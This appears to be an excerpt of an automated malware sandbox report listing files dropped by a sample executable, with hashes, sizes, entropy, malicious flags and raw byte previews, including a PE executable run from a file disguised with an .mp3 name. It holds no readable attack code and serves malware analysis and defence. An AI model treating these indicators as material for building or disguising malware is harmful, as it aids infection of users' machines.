                                              SHA-512:421B3694A2F2E080A03459973FE05A2B23F4FA67323529EE8D9AFDB6B5E9B8D082193A31F7C2B58D3368158FCDEF49D60DBABD3A4F7E656C8ED5B3B95F6BB181
                                              Malicious:false
                                              Preview:oG03pyV354095sGOBRSxx20ZkLDzgY1775f31..ToolTipConstants ToolbarConstants..5AE68g00h7FK7mS7D5oHX0Lg8zcqiE249..DateTimeConstants ComboConstants..k57l9IlHJ6Hh6kaM165f2r455631vlPUD4wvcv2i629945oX3yonmwYJ1ZQ3b9k3A85hVvvLO5932kA786Ho2cf8JpWF9O1Q49JJA3Ry253M82g81F28908fYJ964H3322rp..FontConstants GuiDateTimePicker..gp2P204LuYXL53MN080949vc11DjMN2f1Wi5fW1W3UKCA7x0tWx304A5VA2469d991L4N0358t0PFRN7a0j66K2Mk6T7KP62w1Y1sor6ycoZ17zj7V7YZj9..ToolTipConstants StructureConstants..1SUK6H2348154QFlh2zLMU4A7Ah05AVSQ1d53d9q7azA312Su8qL0QLZJVRE4U18bPc4cpd5Wr07g2g6Y..GuiDateTimePicker GuiDateTimePicker..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:dropped
                                              Size (bytes):1373192
                                              Entropy (8bit):4.041168214657541
                                              Encrypted:false
                                              SSDEEP:24576:T3AoJ3FFp2KHP5jD69JE4N325yEqwGxRtsb+r:LACYDNf1F
                                              MD5:35A5CC0E4D021890E72A070EE02DFDC4
                                              SHA1:BA20DE52CDC21E3D8BD69470381B7D0CB53F1D05
                                              SHA-256:51E725C19B88D14E3D978B54D810398993242C959145F323FDE92CFA55557ADA
                                              SHA-512:AFE5510B3A27CF5E308CDE1E000289777AB9CFD592052B37C990028F51F4D5113E15FCCF7B13CF9A13ED06E3D134ED2009BBD18DDD5B508FA20D050D8D2719C2
                                              Malicious:false
                                              Preview:0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]08]]]]E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]5045]]4C0/03]5E7_5F64]]]]]]]]E]]20/0_0/0_]]3]*]]66]]]]]]EE4E0*]]2]]]06]*]]]4]]02]]]]2]]04]]]]]]]04]]]]]]]]]0_]]02]]]]]]02]4085]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]0944E0*]57]]]]6]*]/863]]]]]]]]]]]]]]]]]]]E]*]0C]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]2]]]8]]]]]]]]]]]082]]048]]]]]]]]]]]2E74657874]]]F42E0*]]2]]]03]*]]02]]]]]]]]]]]]]]2]]0602E72737263]]]/863]]]6]*]]64]]]320*]]]]]]]]]]]]]4]]0402E72656C6F63]]0C]]]]E]*]]02]]]960*]]]]]]]]]]]]]4]]042]]]]]]]]]]]]]]]]D04E0*]]]]]48]]]02]05]D43D0*]C0/]]]/]]]04]]06*827]]2*/60*]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]/33]5]0502]]0/]]//]7E0E]]0*0*037E0E]]0*280F]]0*2C0604/6FE0/2_0//7]/3/0///03*D80/]]]04E08D/3]]0/0_73/]]]*0C0307/60428//]]0*]04/F/05E/6FE0//6FE0//3/0///03*F4]]]]/F/08D/3]]0/0D/F/08D/3]]0//30473/2]]0*/3057E0/]]04/E//04/6/F/028/3]]0*]7E0/]]0
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):579
                                              Entropy (8bit):5.575049796233503
                                              Encrypted:false
                                              SSDEEP:12:SgIrV55RKAnZROwTEeZUCeyNsLrkW6GLr1uQRTPUUD2EdZ:SgAVJKAnvOmUCXW63x0dZ
                                              MD5:E3C40D261A890A50E8616EFBCE725DF6
                                              SHA1:51087DD64E5C3F673C47A3B03CCAFFADB77DCE6D
                                              SHA-256:A1C8B7A1408638A385956EDAAF4EC1DEFB98E94784A5AEAEC9F63FD24CF3F83B
                                              SHA-512:114DE87085139632A912F2BDC2700EB60F166623641C460E818CE7A29EDC2DAC24F9C01B186CFB268976B7605FE496ADDB4300E6EC20507B101659DF2ADD69F8
                                              Malicious:false
                                              Preview:1q61d1LIRu9L98NY7g323ffUm3N34OA9b053foF9228QB26bH7GMa619r0PWWN42j2tR2D8hEkgK7K3vp3hK6080P3n9XyR9V69p7q4ya3IMz6Ok3K41x047vk8e1E1Qn8670H249S28L6tVE20q25S..DateTimeConstants FontConstants..773z76rS6Hr23O8rI30j7eMY3Q3Q7I021atLf93l986mx1e2aZfh09Vpp3s54t8IHY8Va2Hhd8X02KGU4C475coy2wtf84vyn7ZqKXjp3pQtW0vz31xO35lT602945i5Xji30Kd0514wp2A331oT29L3..UpDownConstants ToolbarConstants..9GYWl382o1858qz9x8zk6b6093C9O95Ze6aDdI00zo1V306x40c02010258A0HhwBd1L64l395I5d3fd3C..TreeViewConstants FontConstants..T1X2c09SB0w75y286D20W8G19PHF93019HTC4M34bL843I8I0439nH..UpDownConstants ComboConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):5.547696645967649
                                              Encrypted:false
                                              SSDEEP:12:EBPfOBVX8y2PB4kT4DrgUyYSb2ElZhbuQ7+UNjTpP7:EpyXj2PG64zyfqEtbum+GjTp
                                              MD5:C4CEA733EF0F8C84E8C7081CDCB01B5E
                                              SHA1:66050A0F1A5C5A17532E8D449573A31BE8E8C693
                                              SHA-256:B75166289CC3ACD2E7ECB722F91792CEAD7BCCBE5D230A3AAF211C2027F7E8B4
                                              SHA-512:013A885C743CAE8BC941D76374745D18498CF5F53AEB7C4E02232130A552CC1553C2D3051D85B0494033DA2F5367BA078333659823A7AC236254420EEA0706DA
                                              Malicious:false
                                              Preview:TLR8ELL28..FileConstants TreeViewConstants..A8376Bzc32B160o57k9hBRD5it3w253kAQ5o8v8k9u12nbIk38u3UBQptw0159Wr3it64GO8p7rPNpN0GuFo1719IA059hr10X646..DateTimeConstants ColorConstants..SF1cuZHEA..ToolTipConstants DateTimeConstants..R355Bk4pweAC3JaG5aYh2oi1sFLSG1Vb4WuL047TC9Z01470m5KDs7YDFZZI2q35324Y11703B1734C73vNft25c5Z8Rg3j52gKd26D767Y6qz14Z322h9aJ2lInD369BHe115PTy21e5T3o4hA8ZCnV32wFu8g..ButtonConstants GuiDateTimePicker..648a97EKj9QK1164PH7tl5198sikWF150Q76E7k1KK1Z15Bke0M9..TreeViewConstants ComboConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):562
                                              Entropy (8bit):5.564214025056381
                                              Encrypted:false
                                              SSDEEP:12:pkxSfmKryTM4h6LyEeTNKjGbrGh9VAfwv:pk2mK2TM4oLyEeTgjG3Gh3Afwv
                                              MD5:4C854C21A4E83906AF7AE0B83D1D797B
                                              SHA1:52A423C95344186D45C66780CD55890820E755E0
                                              SHA-256:613C53A8E742366747A9253DD19FAB2527258F08E40699AAAB85D920787A717B
                                              SHA-512:BFEA86080CFFEC1E69EC7F5A1371796A656B8A129A1FEF437FADC8D170CDFD07C6F1BA514FCD14A138D943D89E26621686C366592D9BF6890C83C22A0EFA1963
                                              Malicious:false
                                              Preview:NZ8518kVp3k5h34470sFP55f2z7YD9PrLOE8xR5VK3yay14o..ToolTipConstants ToolTipConstants..1V7q7875S627zc33y98D452je07S62dN4eYoxE5PT6..UpDownConstants ToolbarConstants..rk3o03aO59012kV560TKOL428RABj694W77Zty10nXEJ71t0r7y74Sn3m7cE94W4UrQ00Yz9W85u93H9k5w5uCe0kc5135560kQ80929mH5443KY445p48Yhw..ButtonConstants DateTimeConstants..72ts5u93Icg055NGVnfs12sL6R98Q9u07Sqp09z3rf4G4fg2k8uSIXQuQi385I6a5826RJeh9Gnep1T7t5U5d3ki8y08v0cZ..ToolTipConstants ToolbarConstants..004n5gvFO4r501107u278V9PibNPXDe238mQ5y05V6i21L9yc03U23i18bYF9Uz10KsEA89..ButtonConstants GuiDateTimePicker..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):648
                                              Entropy (8bit):5.642286506031062
                                              Encrypted:false
                                              SSDEEP:12:2y3xfr0t79gqcHuINsJMOrkGgOn1BBaS5GxEu7Femjt/tON9v:v3xfY79gqcHuINsLfgaNGx4m29v
                                              MD5:135F39E327B474DFCF9139F5A9DE5A9B
                                              SHA1:0D70AFD4762C1296355DD9E7579EB57B833D4C0C
                                              SHA-256:0988FF10C9F291F32009CA04929C0156A0E10C5003D30AE266B865E56C064B17
                                              SHA-512:4CD5747C41EF013C5CC884536864C35C45BEEB3FBB794CA6CD891C1F787ACE6A261A0B2E45BBC87677CF6540E5413564D98C2510EE30EC163E8EE3D0E4863E2B
                                              Malicious:false
                                              Preview:TVw8m1vjG6CwK486C1178I0777077425f2zk335753sZFo580ehI3CYyx34I61..ToolbarConstants ToolbarConstants..2cI1Sw6VzV04jfGb2cD97235S1LFzx4FUp6YI907F0T3ECGs6313P747VEs0j7607g1209P1qO37unPA2Ee4lb8t16K02L91a9138i08y1x3p831S9P3E3u4C42rnUiE7J3187KT9zFQ82s4f76R8rO..BorderConstants GuiDateTimePicker..75Z2ug1P65tyHXxmbN6r49hh17t8FFKaTJZ3V129BT3o5K745aMXB2090..ToolTipConstants DateTimeConstants..16I9Q0ZFkx9L6Bz9jk8473aaAS2j9749W42Fgv4s8DI7D6LkO00WC6lk830v0r2y4U190fdr7..ColorConstants GuiDateTimePicker..i1p86J2Y5I7Rbuq7b1EQ4mgiI4K8l1Qd91S381JFJO2HiY5550C7Zi6AL7h529940V3Oz453np94cG4Z19963H451a93lJ9Pi0nK3km9ib5X059TNQa8A6q..ToolbarConstants GuiDateTimePicker..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):633
                                              Entropy (8bit):5.515639729376305
                                              Encrypted:false
                                              SSDEEP:12:Zl70KyLGUkXx+LCaXWKbjy6MGdqNomuLutX/1iBPR6FoCWLqywLHQcs2:gKyLGdX+DXZy6MGdmomuLuJ1ijyWLBM
                                              MD5:0E969295487775DAA7D03B33829684F8
                                              SHA1:613CF0518A258CE3ED5BB2AAC7BAC1FDA71B1EC4
                                              SHA-256:5BADEFDF6C9490D5ED3A5181BB87A30536776827BF7A155957C62B01028FD4FB
                                              SHA-512:7EFCFCEE6E15AF372A6A57F66531FEB1C1873DC22399CE05228369EE3E7E49D69453D75D78131D50217761539BFCE82245140163C50ABAFA1790EEC69F1665E1
                                              Malicious:false
                                              Preview:2k32t5192X8H0KyMR9T20BwJt744c6l26dF9Zo..ToolTipConstants FontConstants..P3Ff6sU5M322sz79T9m6..FileConstants DateTimeConstants..92I1xJd87942g987X7351vdK8411g513yqH8yB263Wn262B3B3150U56mTxXT3V192X808F7uW78Kr5T8t5147sW3CL012z088cq9Jw..FileConstants FontConstants..3m366r1KqTV6qb24..UpDownConstants ButtonConstants..o59Xrz90Xo..ButtonConstants GuiDateTimePicker..2yX62fa6C55b477x097d8WuJU1R264jxF418928662YBke5Y544m0D7U76Z5BX1v84QKpaPZL..ComboConstants TreeViewConstants..z2g24NI1xo99Ngjhf5dc950x5D7jaSFHF2VY6nk2965pY2D8zYa9ak165Z1V9Q90DQ1703w7BGrs9LKw50Ah76rmOF231DfM36Bdx4qBCw7c47szZ6a7SE5I955qD4DU..DateTimeConstants ButtonConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):947288
                                              Entropy (8bit):6.629681466265794
                                              Encrypted:false
                                              SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                              MD5:0ADB9B817F1DF7807576C2D7068DD931
                                              SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                              SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                              SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: FS04dlvJrq.exe, Detection: malicious, Browse
                                              • Filename: M1Y6kc9FpE.exe, Detection: malicious, Browse
                                              • Filename: mJIvCBk5vF.exe, Detection: malicious, Browse
                                              • Filename: lcbF0sywlU.exe, Detection: malicious, Browse
                                              • Filename: 1aG5DoOsAW.exe, Detection: malicious, Browse
                                              • Filename: Factura-2410-CFDI.bat, Detection: malicious, Browse
                                              • Filename: DGFmCcZnM0.exe, Detection: malicious, Browse
                                              • Filename: qZkywW6Q0b.exe, Detection: malicious, Browse
                                              • Filename: AlBXxWizEX.msi, Detection: malicious, Browse
                                              • Filename: mEudzoO1bG.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):947288
                                              Entropy (8bit):6.629681466265794
                                              Encrypted:false
                                              SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                              MD5:0ADB9B817F1DF7807576C2D7068DD931
                                              SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                              SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                              SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (392), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):90504
                                              Entropy (8bit):3.021449759435307
                                              Encrypted:false
                                              SSDEEP:24:QRMMMMMMMMMMMUYeeeeeeeeeeeeeeeeeeeeeeeeeaYdddddddddddddddddddddJ:bHXI7WPxVcWVWC9EnIhnrQ
                                              MD5:BE932D231EF60DCF6AD6C579873B550C
                                              SHA1:CA37AE517C7D341E008CBD71BEAB29ACA839002C
                                              SHA-256:D47ED1047E043162E221D1A21B5E19D8A24641442BCB17C6C8A51F9456998751
                                              SHA-512:21385ADA5436112899AAA4651A6D561499735E6E59674258C9DE6B38A50E671276AE9E8B5C7F70E60321CF41846AE34E299D179FBF6226027D9A9C99751AD09B
                                              Malicious:true
                                              Preview:..T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.....T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):609
                                              Entropy (8bit):5.517312307798012
                                              Encrypted:false
                                              SSDEEP:12:UIVldnzxwXVoUbApRq1RfoSbdLjPlruYpdMQ2DuyX4Ozjc:UIVrzArKSRjbdLpruYp6LVXhc
                                              MD5:834D7436B1908047FBC4801E3D9EA735
                                              SHA1:8CC6441F6A4A65902AE20C8D0D73A59048227253
                                              SHA-256:056D4C251DE76715737124CCB63E6652840EE3EE66A41F45B109B3F413EE864B
                                              SHA-512:EFFC86EF8949E1C231F9C18C807AFC39882CAFA2BEB5E87F10E2AC5D8378D2F2AC3C94679EEFCFE9F4AF6C260E524BAC051FC789D147215CCD552A1D44EDAE7A
                                              Malicious:false
                                              Preview:f50235..ColorConstants FileConstants..352950q81ZrVFh028w23smi5ASTD3t45Ct47b4Fw158ndgMh3K8m85EiwUL2u71BM7lZtO224PpgS..DateTimeConstants ToolbarConstants..7I140n089014u589NkB234fraO117t2bUc22235..ButtonConstants StructureConstants..051t2ZNexB6gD177M3wL7DwCP9fyN9IObJ13veie35ZCH8hkXq072r3E65..UpDownConstants GuiDateTimePicker..0HA4463l63225A30l7V..TreeViewConstants ButtonConstants..2165..FontConstants GuiDateTimePicker..17cPgv6Fdp776612952eHNUp781420VTI8W983PRn00cpvD43sshTf0Ie6qdFaB2bhPVHJN14687h1QD9ZM6h26971hH5rc938Z7D60g585q20VD24BhB05L626UeS525S18lCuvmC7PZKb9k7MHy..GuiDateTimePicker StructureConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):113665448
                                              Entropy (8bit):6.924457735552897
                                              Encrypted:false
                                              SSDEEP:196608:Gt8gSuolgztogeon51s+rCBTHJVUdOHtBJagqthtgE/zBACLTxLun176fzoEh+To:M
                                              MD5:BD375FCAB430AB12BBE70CFFB392EE88
                                              SHA1:E7E5B1703F84C7ECF79E1F2F0F425FC084F1D215
                                              SHA-256:DE5DC11F91E1F382D44EA0CFD15983680CD2A9239882672C003EB7DA281F5218
                                              SHA-512:EAE4BF46DF8BEA8F9B0C4E028BDE510AFBB12A9BFB9709E5271848D4C9AB38879B987F6DCABE4B0DE7536A481F368A2EF516295C443BAEAAE8E3C2780C9C9F30
                                              Malicious:false
                                              Preview:..;.$...bp....u.w ..... .kJ....Q]Du.........e..~7....!}{%.9.k.X...j..ke.....J*b.+(<. N-dP1...E7........0............g..p...".l....`..b.|.b....MEZQ....(iyh}...P...?........+..-._k.?..T.....z..'.m.. ....#.c.s.-`.&..V..p...u#.$P....e..DF....W...w.j.O._.-....u= .....IA^.z....sl....&....o....Yp..E....1..2.hd~Bv....{.Xe...n.?.mMp|.c=.....Z}[by..]/..H...K.....k.r....n.3.g.b.6.4.w.B.4.8.0.3.7.X.O.5.n.9.0.i.6.5.g.8.r.2.d.J.2.....l.2.Q.8.l.H.0.L.....,...x.0]t..E.....m...1?h.o..!.>.R..m....X...4C..U..i....p#"....<@....wI.y.^j..}E....:A..X4..{Q...>...I...bI]a ...f..'...%...!.......t.RJm(.o.68.......J~.~o.x/}.E...v.....k.6.B.2.g.L.3.3.1.0.w.o.....X.t.6.Q.V.C.5.4.T.7.2.s.5.r.5.9.v.0.4.H.q.3.z.A.h.r.4.o.2.S.W.G.O.Z.M.5.F.L.e.6.m.K.1.3.N.W.k.8.....j.y.c.P.7.6.6.b.5.9.x.d.0.P.1.k.6.8.f.r.h.v.4.8.t.5.p.L.i.G.3.....m.6.4.W.9.2.....9.8.4.2.X.U.Y.0.5.4.4.2.9.C.5.W.3.U.9.6.2.X.j.e.C.r.Z.1.Y.T.9.3.k.....b.8.4.E.9.e.9......L..b..`..n...zh.jQ.3.^..<bDS.0../5.m..:|..)..Ja.5r.,.../
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):41169
                                              Entropy (8bit):5.574992140650956
                                              Encrypted:false
                                              SSDEEP:768:SqzHu71BxiT+rwNwh5KG/KKQs2TUdeDPz6YzTwnuO+YZk7IZ:NHU1rstNrGiKQRT9DL6DuOP9
                                              MD5:5FE3C2E677E90B8971DCAEC9D9CF973D
                                              SHA1:CCCEFD97B61B17F2BC60983D2437925A7B063B20
                                              SHA-256:762982A2B57B2A93DD63FBF230DA414B6C3ABC6240D4B0AF7BB940DC81B74512
                                              SHA-512:2C204731CC1BDB18259E737CDCE622833367413BF10A75A73E23D3C531E3739093D0E4227C032AAB61EA8F26A8D65175AC3072EAF61116FF07BC623E0D402727
                                              Malicious:false
                                              Preview:Gs8k9G..09Dze2Ri21v07024j3Bkj08k43620w..as6F9u248nt4E5D34X8TicUo56G1p6Iq7HWQ6CO543yP0E..xaJjJ6998evt364K2JMk3JUL1V169d17W1525g8u64Q8mg624Dq69u..RwDHspQjqT7082C211yji23005131f84T0V4Rt783H5qN..71503293t47A3715b4GE0K1n2HSP78l25n49k2qOp668h89L439GV76rXE63A660vI238..VPtgmDkG5IY651h2xX92d3O72m544t7j6KbS3789u3..8juXPy4HfT34a96W79i4L635wQN7C64m0fV5Q6G83u2Dsd..phmvnO5wH7bw707x270573Yr30Iaqb8Z3ornK7..Sk69g85nW3urpi71T05z02880K89onK84T33dy93ziqP..4J937x4E606vqL7fKZg2G8uTA2f20g8z8N7j58097O6w98030D1O8RN9S..Mnh8Sb8x5UW0x4M26I8f394Z8..9A9cur15YeDDM5O8G3A7rDs4949a4k9RYF76v99K..SM6gUf3u8v64W2N889l16N5arA6z268E1Y8T6c8b27d42d29S6i..S8whuJPCVO3N3Fm05JeGtD4M..l1p19Kskx87icmQeA2umK9E66LU8j87e320208152Hk75O7B1OP9UU22..t602Dct2yRctvCMtZyp4kn25XRJ0qH921b0r67t..4940R0K3j25Z941pc385q1bKK31ajV75rr6v905G4b497939SDz6k961po13O70z0..gu0QN79T640hn842q969k980Qe8i3k78137xBT5QI4x94G..u8u2ItTd0afA0F0T8lk38J1Eu5W1867To0PF8V8466vS13..Lc5l4blEH80kJtCcncqb3G3r12116x544DE59gG1Z0gR055nei3um11eU6x48Y..n62F5C0l6GM181230H77R8364N7
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):517
                                              Entropy (8bit):5.60876413392208
                                              Encrypted:false
                                              SSDEEP:12:g3tc6T0er7S8x1pbJ5+HB+PteGsoregI5v:sTNr7S8rpbJdPtWg8v
                                              MD5:4DAA3E600C4D2C162FFE78C5DF68AB8E
                                              SHA1:C1F052EB1577599B89B70AE99BD9E6C8DDE4F822
                                              SHA-256:C2B1869137E2E69E3969C50A0918EB71C5797F84FAF4093AEF0C890957A193EA
                                              SHA-512:35C537693DF896C6B62118BD38BBDC6C0B4233C391FA11FEC0E49373E08E7BAEDC9FAB07489BC9C55D7D69797820AEFC6C21C62B5A8669EE8AEF297DBF89ED6F
                                              Malicious:false
                                              Preview:94fl4Vi93m506967tqUkd2rq80v81m3D5T71v6B8JtB12z46779Q7o7M6EGvF4uJWM5dt4i62H71S43T9575xR5xP644ye..ToolbarConstants ToolbarConstants..59s492Ipmlntg9c0WuAa6yOc2fLAUFHlRtlbYoa..FileConstants ToolbarConstants..863Zy4EYs568DAWVZ2uH3890igu5Y361H1Y8v4o929lSB6556M2yTP3o342t8721N0H6p5nw5959eA2..GuiDateTimePicker StructureConstants..c64xycev244ZQqU4x410L5X6rVO617q4C7z3K7gB5k81h3g4sx2HPo2VDBj113h748313BS7G7jI8bt315ob95142G2g09z0..StructureConstants ToolTipConstants..QV0HiRFd3ZDK9227R86G6WQ..ComboConstants GuiDateTimePicker..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):507
                                              Entropy (8bit):5.6090252322037335
                                              Encrypted:false
                                              SSDEEP:12:B0SXXoGYepQld6qJM7hBfZJyCv6jMJoDbGPWqJ5QEWz:JlYQyd6WM7BJzS4mbtq5uz
                                              MD5:992C91B45A9F3472868D47E61CB8675E
                                              SHA1:FCDFBC8EC428982B4CB0B09FB00244DE0BC78073
                                              SHA-256:A8A5116542D33261544E18C4431C11A45F77AB24A7F06A2C1D06480066EC6E62
                                              SHA-512:24054844512035AB6962F3ABE2DA36D56AC7E182A72A19D8A38F1C356D7BDE30F14FE6FE3EF057C602A73E53A5D9131676C01F1EF99B545877015A4D3243B9EB
                                              Malicious:false
                                              Preview:8u945m2142LJ65a6So7R8t5st6601672XsVFQib88SnLg9143011331K3RuSbm3..GuiDateTimePicker StructureConstants..mSs378DDJFLCg18436734Q4owR926424B2q2EexiB..DateTimeConstants GuiDateTimePicker..9ZD6F6qLj9L01K0Z904p58I62uwhO5xE78414y9z074U1i4TxBRJtk1ak3qC223u0A74u83jKy0t..ToolbarConstants ToolbarConstants..vhhqME9L023D54yNN5374t7676B88B69DrU6uipg1csk9mRX436188452v88a57mqh5Yv930203v1bX00p630uz9NMO0qrg22OfJjm0qX53kIgVl4B343Q4xd7GM8R741352Bxng4HWRbY8r1swz4E5hE74167uHr3R13on315KY89..UpDownConstants DateTimeConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:modified
                                              Size (bytes):45984
                                              Entropy (8bit):6.16795797263964
                                              Encrypted:false
                                              SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                              MD5:9D352BC46709F0CB5EC974633A0C3C94
                                              SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                              SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                              SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):508
                                              Entropy (8bit):5.479727752033359
                                              Encrypted:false
                                              SSDEEP:6:8RrGdDpW9J7mwnTXTJ+VmSgRTcG7VA+UCduyBrgWDgRi8Ty8Mu2C/B2azVWmUOQ8:Aq/SRLTmgZ7VzwODJPlCbUOQH8raBPc
                                              MD5:D391F8B614A342CFF9FCBF8F4E41C934
